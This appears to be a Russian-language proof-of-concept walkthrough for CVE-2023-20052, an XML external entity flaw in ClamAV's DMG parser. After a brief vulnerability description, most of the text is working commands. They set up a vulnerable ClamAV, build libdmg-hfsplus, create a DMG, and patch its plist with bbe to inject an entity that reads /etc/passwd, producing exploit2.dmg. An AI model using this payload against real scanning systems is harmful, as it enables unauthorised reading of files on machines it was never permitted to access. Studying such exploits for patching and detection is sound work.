
Уязвимость утечки информации CVE-2023-20052 в анализаторе файлов DMG в ClamAV
Уязвимость утечки информации CVE-2023-20052 в парсере DMG-файлов ClamAV
Уязвимость в парсере DMG-файлов ClamAV версий 1.0.0 и более ранних, 0.105.1 и более ранних, а также 0.103.7 и более ранних может позволить неаутентифицированному удалённому атакующему получить доступ к конфиденциальной информации на уязвимом устройстве. Эта уязвимость связана с включением подстановки сущностей XML, что может привести к внедрению внешних сущностей XML. Атакующий может использовать эту уязвимость, отправив специально сформированный DMG-файл для сканирования ClamAV на уязвимом устройстве. Успешная эксплуатация может позволить атакующему извлечь байты из любого файла, который может быть прочитан процессом сканирования ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg

